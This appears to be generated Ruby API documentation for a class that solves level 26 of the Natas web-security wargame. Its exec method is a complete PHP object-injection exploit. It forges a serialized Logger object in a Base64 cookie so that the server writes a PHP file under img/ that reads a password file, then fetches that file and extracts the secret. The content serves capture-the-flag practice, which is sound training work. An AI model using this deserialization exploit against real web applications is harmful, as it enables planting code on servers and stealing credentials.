Class: NatasLevel26

Inherits:
NatasLevelBase show all
Defined in:
lib/natas.rb

Overview

Level 26

Constant Summary collapse

LEVEL = 
26
PAGE = 
'/'
PAYLOAD = 
%(<? echo(file_get_contents("#{WEBPASS}/natas27")); ?>)
LENGTH = 
20
DICT = 
('a'..'z').to_a +
('A'..'Z').to_a +
('0'..'9').to_a

Constants inherited from NatasLevelBase

NatasLevelBase::HOST, NatasLevelBase::LOGIN, NatasLevelBase::PASSWORD_LENGTH, NatasLevelBase::PORT, NatasLevelBase::WEBPASS

Instance Attribute Summary

Attributes inherited from NatasLevelBase

#login, #password

Instance Method Summary collapse

Methods inherited from NatasLevelBase

#get, #initialize, #level, #post

Constructor Details

This class inherits a constructor from NatasLevelBase

Instance Method Details

#execObject 



732
733
734
735
736
737
738
739
740
741
742
743
744
 
# File 'lib/natas.rb', line 732

def exec
  id = String.new
  LENGTH.times { id << DICT.sample }
  file = "img/#{id}.php"

  payload = %(O:6:"Logger":3:{s:15:"\x00Logger\x00logFile";s:#{file.length}:"#{file}";s:15:"\x00Logger\x00initMsg";s:0:"";s:15:"\x00Logger\x00exitMsg";s:#{PAYLOAD.length}:"#{PAYLOAD}";})

  get(PAGE, { 'Cookie' => "drawing=#{Base64.strict_encode64(payload)}" })
  data = get("/#{file}").body
  match = /(\w{32})\n/.match(data)
  not_found unless match
  found(match[1])
end